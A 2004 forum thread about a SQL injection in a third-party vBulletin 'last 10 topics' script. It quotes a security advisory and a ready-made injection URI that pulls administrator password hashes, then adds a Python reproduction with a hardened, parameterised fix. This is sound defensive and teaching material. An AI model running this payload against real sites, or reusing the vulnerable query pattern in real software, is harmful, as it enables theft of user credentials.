buro9
Mon 15th Nov '04, 2:11pm
http://www.securityfocus.com/bid/11658/info/
Has anyone traced the file last.php yet?
Clearly it's not one that remains part of an installed vB... but is it third party? Or is it one of the install, upgrade or merge scripts?
Any clues?
Info on the vulnerability at the above address, but in summary:
vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
An attacker exploits this issue to manipulate and inject SQL queries onto the underlying database. It is reportedly possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to attack the underlying database.
Update: It is reported that this vulnerability exists in third party scripts that can be used with vBulletin. Currently, the vendor of the affected scripts is not known. This BID will be updated as more information becomes available.
An example URI sufficient to exploit this vulnerability has been provided:
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
hi all, a new SQL injection has been found in vBulletin Forums 3.0.x. The vulnerability is found in last.php, the last 10 topics hack:
last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
To solve the problem delete fsel? from ttlast.php and last10.php.
Best Regards,
Dr.Death
THE MAN OF THE DARK SIDE
I couldn't find mention of it on these boards... but I'd rather face the flak of starting this thread and have it traced and nuked than have us in the dark about this stuff.
What is the last 10 topics hack?
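As an added example (not code from this thread, from vBulletin, or from the affected add-on), the injection the advisory describes can be reproduced end to end against a throwaway SQLite database: the quoted URI is URL-decoded, the fsel value is spliced into a SELECT the way a "last 10 topics" script apparently did, and the result row carries an administrator's password hash instead of a thread title. The way last.php built its query is an assumption here, chosen so that the thread's own payload parses as SQL; the table layout, rows, hash placeholders and URIs are all constructed for the demo. The hardened builder beside it shows the fix a practitioner would want: the request supplies data (forum ids, a limit), never SQL text, and every value is bound as a parameter.

```python
"""
Added example, not code from the thread or from any vBulletin add-on.

BID 11658 says a third-party "last 10 topics" script (last.php) splices the
fsel request parameter into a SELECT.  The PHP itself is not on the page, so
the query construction below is an ASSUMPTION chosen so that the thread's own
payload parses; the schema, rows and hash placeholders are constructed.
"""
import sqlite3
from urllib.parse import parse_qs, quote, urlsplit

# The URI quoted in the thread, with the forum's line-wrap spaces removed.
PAYLOAD_URI = (
    "http://www.example.com/last.php?fsel=,user.password%20as%20title,"
    "user.%20%20%20%20username%20as%20lastposter%20FROM%20user,"
    "thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201"
)

# What a benign caller (e.g. last10.php) is ASSUMED to pass: the tail of the
# query that selects which forums to list.  Letting a URL carry SQL is the bug.
LEGIT_FSEL = " FROM thread WHERE forumid IN (2,3) ORDER BY lastpost DESC LIMIT 10"


def make_db():
    """Constructed vB-like tables; usergroupid 6 is the Administrators group."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE user (userid INTEGER, username TEXT, password TEXT, usergroupid INTEGER);
        INSERT INTO user VALUES (1, 'admin', 'ADMIN_HASH', 6);
        INSERT INTO user VALUES (2, 'alice', 'ALICE_HASH', 2);
        CREATE TABLE thread (threadid INTEGER, forumid INTEGER, title TEXT, lastposter TEXT, lastpost INTEGER);
        INSERT INTO thread VALUES (10, 2, 'Welcome', 'alice', 100);
        INSERT INTO thread VALUES (11, 3, 'Rules', 'admin', 200);
        INSERT INTO thread VALUES (12, 4, 'Private', 'admin', 300);
        """
    )
    return db


def fsel_from_uri(uri):
    """Pull the fsel parameter out of a request URI, URL-decoded."""
    return parse_qs(urlsplit(uri).query, keep_blank_values=True)["fsel"][0]


def legit_uri():
    """The request a benign caller would make (constructed)."""
    return "http://www.example.com/last.php?fsel=" + quote(LEGIT_FSEL)


def build_query_vulnerable(fsel):
    """ASSUMED reconstruction of the flawed pattern: the request parameter is
    concatenated straight onto the column list.  With LEGIT_FSEL it lists
    threads; with the payload it selects user.password AS title instead."""
    return "SELECT title, lastposter" + fsel


def run_vulnerable(db, uri):
    """Execute the request the way the flawed script would."""
    return db.execute(build_query_vulnerable(fsel_from_uri(uri))).fetchall()


def build_query_safe(forumids, limit):
    """Hardened form: the request supplies data, never SQL.  Forum ids must be
    integers, the limit is clamped, and every value is bound as a parameter,
    so the payload above fails at int() instead of reaching the database."""
    ids = [int(f) for f in forumids]  # ValueError on anything non-numeric
    if not ids:
        raise ValueError("no forums selected")
    limit = max(1, min(int(limit), 50))
    marks = ",".join("?" * len(ids))
    sql = ("SELECT title, lastposter FROM thread "
           f"WHERE forumid IN ({marks}) ORDER BY lastpost DESC LIMIT ?")
    return sql, (*ids, limit)


def run_safe(db, forumids, limit):
    """Execute the hardened query with bound parameters."""
    sql, params = build_query_safe(forumids, limit)
    return db.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("benign request :", run_vulnerable(db, legit_uri()))
    print("injected request:", run_vulnerable(db, PAYLOAD_URI))
    print("hardened query  :", run_safe(db, ["2", "3"], 10))
```

The injected row is four columns wide: the two thread columns the script expected, then the administrator's password hash aliased as title and the username aliased as lastposter, which is exactly why the advisory warns about leaking password hashes. Note that the hardened version does not try to filter SQL keywords out of fsel; the only safe shape is one where the request can never contribute query text at all.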